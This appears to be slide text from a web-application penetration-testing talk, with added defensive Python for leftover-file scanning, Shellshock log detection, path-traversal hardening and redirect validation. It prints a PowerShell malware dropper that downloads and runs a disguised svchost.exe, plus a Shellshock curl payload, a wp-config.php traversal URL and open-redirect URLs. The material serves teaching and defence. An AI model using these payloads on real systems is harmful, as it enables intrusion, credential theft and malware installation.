Operating System
Web Server / Database
Framework / CMS
Web Application / Web Service
Plug-in
Attack Surfaces
• SQL injection
• LDAP injection
• XPATH injection
• Command injection
• Code injection
• Ex:
• AJAX
• JSON ***
Low Hanging Fruits
powershell "Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;
(New-Object
System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindo
ws/c5675e0b/dd.exe','dd.exe');
(New-Object System.Net.WebClient).DownloadFile
('http://img1.imagehousing.com/0/art-297435.jpg','favicon.jpg');
(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg
of=svchost.exe skip=2931 bs=1');
Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');"
Low Hanging Fruits
http://www.victim.com?cmd=
Command injection
Malicious File Upload
Low Hanging Fruits
- HTTP PUT
- File upload feature
- Weak CMS admin password
- Platform vulnerability
- RCE
- Authentication bypass
- Log file + LFI
• Temp file / backup file test trick
– Path + .zip, .rar, .bak
– Ex: /admin
• http://testsite.com/admin.zip
• http://testsite.com/admin.rar
• http://testsite.com/admin.bak
Low Hanging Fruits
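The backup-file trick works because archives and editor copies are left in the document root where the web server will happily serve them. The server-side counterpart is a pre-deploy hygiene check. The script below is an added example (not from the slides): it walks a document root and lists every file whose name ends in an archive, backup or editor-temp suffix, using a constructed sample webroot built in a temp directory; the suffix list and the fixture layout are assumptions.

```python
import os
import tempfile
from pathlib import Path

# Suffixes that archivers, editors and admins leave behind in a document root (assumed list).
LEFTOVER_SUFFIXES = (".zip", ".rar", ".tar", ".gz", ".7z", ".bak", ".old", ".orig",
                     ".save", ".swp", ".tmp", "~")


def is_leftover(name):
    """True when the file name ends with a backup/archive/temp suffix (case-insensitive)."""
    return name.lower().endswith(LEFTOVER_SUFFIXES)


def find_leftovers(webroot):
    """Walk the document root and return the relative paths of leftover files, sorted."""
    root = Path(webroot)
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if is_leftover(name):
                found.append(str(Path(dirpath, name).relative_to(root)))
    return sorted(found)


def build_fixture():
    """Create a constructed sample webroot in a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "admin").mkdir()
    (root / "admin" / "index.php").write_text("<?php // admin panel\n")
    (root / "admin.zip").write_bytes(b"PK\x03\x04")          # archive of the admin panel
    (root / "config.php").write_text("<?php $db_pass = 'x';\n")
    (root / "config.php.bak").write_text("<?php $db_pass = 'old';\n")
    (root / "index.php~").write_text("")                     # editor backup copy
    (root / "logo.png").write_bytes(b"\x89PNG")
    return str(root)


if __name__ == "__main__":
    for rel in find_leftovers(build_fixture()):
        print("leftover:", rel)
```

Run it against the real document root before each deploy; anything it lists is readable by anyone who guesses the name, and a `.bak` of a PHP file is served as plain text, so the source (and any credentials in it) leaks.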
Ref: https://securenetworkmanagement.com/shellshock-simple-user-agent-exploit/
Using Components with Known Vulnerabilities
Shellshock
curl "http://cgi-bin/service/index.cgi" --insecure -H "User-Agent: () { :; }; /bin/bash 'ping 192.168.30.54 -c 10'"
Low Hanging Fruits
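Because the Shellshock trigger is the literal function-definition prefix `() {` arriving in any header that the CGI handler exports as an environment variable, the probe is easy to spot in web server logs after the fact. The following detector is an added example (not from the slides or the referenced article): it parses Apache "combined" format lines, checks the request, Referer and User-Agent fields for the signature, and falls back to scanning the raw line when a line does not parse. The log lines are constructed samples; the TEST-NET address and the field names are assumptions.

```python
import re

# Constructed sample lines in Apache "combined" format (not taken from the slides).
# The first and third carry the Shellshock probe in the User-Agent and Referer headers.
SAMPLE_LOG = r"""
10.0.0.5 - - [10/Oct/2015:13:55:36 +0000] "GET /cgi-bin/service/index.cgi HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c 'ping 192.0.2.10 -c 10'"
10.0.0.6 - - [10/Oct/2015:13:55:37 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [10/Oct/2015:13:55:38 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "curl/7.35.0"
"""

# One regex for the log line, one for the payload signature.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The function-definition prefix that triggers the bug: "() {" with optional whitespace.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

HEADER_FIELDS = ("request", "referer", "agent")


def find_shellshock(log_text):
    """Return one dict per header field that carries the Shellshock signature."""
    hits = []
    for line in log_text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        m = COMBINED_RE.match(line)
        if m is None:
            # Unparseable line: scan the raw text so an unusual format cannot hide a probe.
            if SHELLSHOCK_RE.search(line):
                hits.append({"ip": line.split(" ", 1)[0], "field": "raw", "value": line})
            continue
        for field in HEADER_FIELDS:
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append({"ip": m.group("ip"), "field": field, "value": value})
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['ip']}: Shellshock pattern in {hit['field']}: {hit['value']}")
```

Note that the signature is checked in every logged header, not just User-Agent: Referer, Cookie and custom headers reach bash the same way, and a detector keyed only on the User-Agent field misses those probes. A hit on a 500 response is as interesting as a 200, since a failed payload still shows someone is testing the host.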
• IIS
https://www.youtube.com/watch?v=vw4JFKZ3lS0
MS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635)
Using Components with Known Vulnerabilities
Low Hanging Fruits
http://blog.trendmicro.com/trendlabs-security-intelligence/iis-at-risk-an-in-depth-look-into-cve-2015-1635/
• IIS
MS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635)
Information leakage
Using Components with Known Vulnerabilities
Low Hanging Fruits
• OpenSSL
Heartbleed (CVE-2014-0160)
• Abuses the TLS Heartbeat extension to read
extra data from the server's memory.
• Exposed services include email, instant
messaging (IM), VPN and web.
• OpenSSL 1.0.1 through 1.0.1f (inclusive) are
vulnerable
http://heartbleed.com/
Using Components with Known Vulnerabilities
Low Hanging Fruits
https://www.baagames.com/2014/04/steam-heartbreed/
Using Components with Known Vulnerabilities
Low Hanging Fruits
Operating System
Database
Framework / CMS
Web Application / Web Service
Plug-in
Web Server: platform
CMS + database management web UI: components
Using Components with Known Vulnerabilities
Low Hanging Fruits
https://www.youtube.com/watch?v=zSva2UPwKvo
Anon Joker
Using Components with Known Vulnerabilities
Low Hanging Fruits
http://the.victim.com/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
Connect to Database
Using Components with Known Vulnerabilities
Low Hanging Fruits
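The cherry-plugin request above is a plain path traversal: the `file` parameter is joined onto the plugin's directory and five `../` steps climb from `admin/import-export` back to the site root, where `wp-config.php` holds the database credentials (the "Log file + LFI" item on the earlier slide is the same flaw read from the other direction). The example below is added here and is not the plugin's code: it shows the flawed join next to a hardened lookup that resolves `..` and symlinks and then refuses anything outside the base directory. The WordPress-like tree is constructed in a temp directory; the file names and the exact layout are assumptions.

```python
import os
import tempfile
from pathlib import Path


def vulnerable_path(base_dir, requested):
    """The flawed pattern: the user-supplied value is joined onto the script's directory unchanged."""
    return os.path.join(base_dir, requested)


def vulnerable_reads(base_dir, requested):
    """True when the flawed join lands on an existing file, wherever on disk it is."""
    return os.path.isfile(vulnerable_path(base_dir, requested))


def resolve_download(base_dir, requested):
    """Hardened lookup. Returns ("ok", path) only for a regular file that is still inside
    base_dir after ".." and symlinks are resolved; ("denied", None) for anything that
    escapes the directory; ("missing", None) when the file does not exist."""
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()     # an absolute 'requested' replaces base entirely
    if candidate != base and base not in candidate.parents:
        return "denied", None
    if not candidate.is_file():
        return "missing", None
    return "ok", candidate


def build_fixture():
    """Constructed WordPress-like tree in a temp dir; returns the plugin's import-export dir."""
    site = Path(tempfile.mkdtemp(prefix="site-"))
    (site / "wp-config.php").write_text("<?php define('DB_PASSWORD', 'secret');\n")
    export_dir = site / "wp-content" / "plugins" / "cherry-plugin" / "admin" / "import-export"
    export_dir.mkdir(parents=True)
    (export_dir / "export.xml").write_text("<export/>\n")
    return str(export_dir)


if __name__ == "__main__":
    base = build_fixture()
    for req in ("export.xml", "../../../../../wp-config.php", "/etc/passwd"):
        print(req, "| flawed reads:", vulnerable_reads(base, req),
              "| hardened:", resolve_download(base, req)[0])
```

The containment check compares fully resolved paths rather than looking for `..` in the string, so it also stops absolute paths, URL-decoded variants handled upstream, and symlinks planted inside the export directory. Denied requests are worth logging with the raw parameter value: a `../` sequence aimed at `wp-config.php` is a reliable indicator that the site is being probed.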
https://your.bank.com/?url=http://hacker.site.com
Unvalidated Redirects and Forwards
Low Hanging Fruits
https://your.bank.com/?url=%68%74%74%70%3a%2f%2f%68%61%63%6b%65%72%2e%73%69%74%65%2e%63%6f%6d
Unvalidated Redirects and Forwards
Low Hanging Fruits
Testing for Client Side URL Redirect (OTG-CLIENT-004)
Unvalidated Redirects and Forwards
Low Hanging Fruits
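The two bank URLs on the previous slides are the same redirect, once plain and once percent-encoded; the encoded form exists because naive filters inspect the raw query string while the framework hands the application the decoded value. The validator below is an added example (not from the slides or the OWASP guide): it contrasts a blocklist check on the raw parameter, which the encoded form slips past, with an allowlist check on the decoded value that accepts only a same-site relative path or an absolute URL on the expected host. The host name `your.bank.com`, the parameter name `url` and the sample URLs follow the slides; everything else is an assumption.

```python
from urllib.parse import urlsplit, parse_qs

ALLOWED_HOST = "your.bank.com"   # the only host an absolute redirect target may point to


def raw_param(full_url, name="url"):
    """Return the parameter value exactly as it appears in the query string (still encoded)."""
    for pair in urlsplit(full_url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


def decoded_param(full_url, name="url"):
    """Return the parameter as a web framework hands it to the application (percent-decoded)."""
    values = parse_qs(urlsplit(full_url).query, keep_blank_values=True).get(name)
    return values[0] if values else None


def naive_blocklist(raw_value):
    """The kind of check that fails: looks for an external scheme in the raw, still-encoded value."""
    return not raw_value.lower().startswith(("http://", "https://"))


def is_safe_redirect(target, allowed_host=ALLOWED_HOST):
    """Allowlist check on the decoded value: same-site relative path or same-host absolute URL."""
    if not target:
        return False
    # Backslashes and control characters are parsed inconsistently by browsers; refuse them.
    if any(ch == "\\" or ord(ch) < 0x20 for ch in target):
        return False
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: must start with a single "/" ("//host" is scheme-relative).
        return target.startswith("/") and not target.startswith("//")
    # hostname (not netloc) so "https://your.bank.com@evil.example/" is judged by its real host.
    return parts.scheme in ("http", "https") and parts.hostname == allowed_host


if __name__ == "__main__":
    for full in ("https://your.bank.com/?url=http://hacker.site.com",
                 "https://your.bank.com/?url=%68%74%74%70%3a%2f%2f%68%61%63%6b%65%72%2e%73%69%74%65%2e%63%6f%6d",
                 "https://your.bank.com/?url=/account/summary"):
        raw, dec = raw_param(full), decoded_param(full)
        print(f"{raw!r}: naive passes={naive_blocklist(raw)} allowlist passes={is_safe_redirect(dec)}")
```

Validate the value the application actually uses, after the framework's decoding, and compare the parsed host rather than searching the string. An even simpler design that avoids parsing altogether is to accept only a short key that maps to a server-side table of redirect targets.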
https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
• Automatic Scan
Low Hanging Fruits
• Some types of insecure direct object references
• Missing function-level access control
• Business logic
– Step/Flow
– Stage
– Limit
Vulnerabilities that cannot be
discovered by tools
OWASP Testing Guide
Information Gathering
Configuration and Deployment Management Testing
Identity Management Testing
Authentication Testing
Authorization Testing
Session Management Testing
Input Validation Testing
Test for Error Handling
Test for Weak Cryptography
Business Logic Testing
Client Side Testing